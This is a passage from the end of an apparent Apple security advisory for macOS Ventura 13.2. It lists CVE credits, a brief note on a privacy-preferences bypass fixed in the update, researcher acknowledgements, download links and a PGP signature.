CVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Windows Installer  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23508: Mickey Jin (@patch1t)

Additional recognition

Bluetooth  
We would like to acknowledge an anonymous researcher for their  
assistance.

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

Shortcuts  
We would like to acknowledge Baibhav Anand Jha from ReconWithMe and  
Cristian Dinca of Tudor Vianu National High School of Computer  
Science, Romania for their assistance.

WebKit  
We would like to acknowledge Eliya Stein of Confiant for their  
assistance.

macOS Ventura 13.2 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke  
Nxnt7RAA2a0c/Ij93MfR8eiNMkIHVnr+wL+4rckVmHvs85dSHNBqQ8+kYpAs2tEk  
7CVZoxAGg8LqVa6ZmBbAp5ZJGi2nV8LjOYzaWw/66d648QC2upTWJ93sWmZ7LlLb  
m9pcLfBsdAFPmVa8VJO0fxJGkxsCP0cQiBl+f9R4ObZBBiScbHUckSmHa6Qn/Q2U  
VsnHnJznAlDHMXiaV3O1zKBeahkqSx/IfO04qmk8oMWh89hI53S551Z3NEx63zgd  
Cx8JENj2NpFlgmZ0w0Tz5ZZ3LT4Ok28ns8N762JLE2nbTfEl7rM+bjUfWg4yJ1Rp  
TCEelbLKfUjlrh2N1fe0XWBs9br/069QlhTBBVd/qAbUBxkS/UOlWk3Vp+TI0bkK  
rrXouRijzRmBBK93jfWxhyd27avqQHmc04ofjY/lNYOCcGMrr813cGKNs90aRfcg  
joKeC51mYJnlTyMB0nDcJx3b5+MN+Ij7Sa04B9dbH162YFxp4LsaavmR0MooN1T9  
3XrXEQ71a3pvdoF1ffW9Mz7vaqhBkffnzQwWU5zY2RwDTjFyHdNyI/1JkVzYmAxq  
QR4uA5gCDYYk/3rzlrVot+ezHX525clTHsvEYhIfu+i1HCxqdpvfaHbn2m+i1QtU  
/Lzz2mySt3y0akZ2rHwPfBZ8UFfvaauyhZ3EhSP3ikGs9DOsv1w=  
=pcJ4  
-----END PGP SIGNATURE-----

Tag

#wifi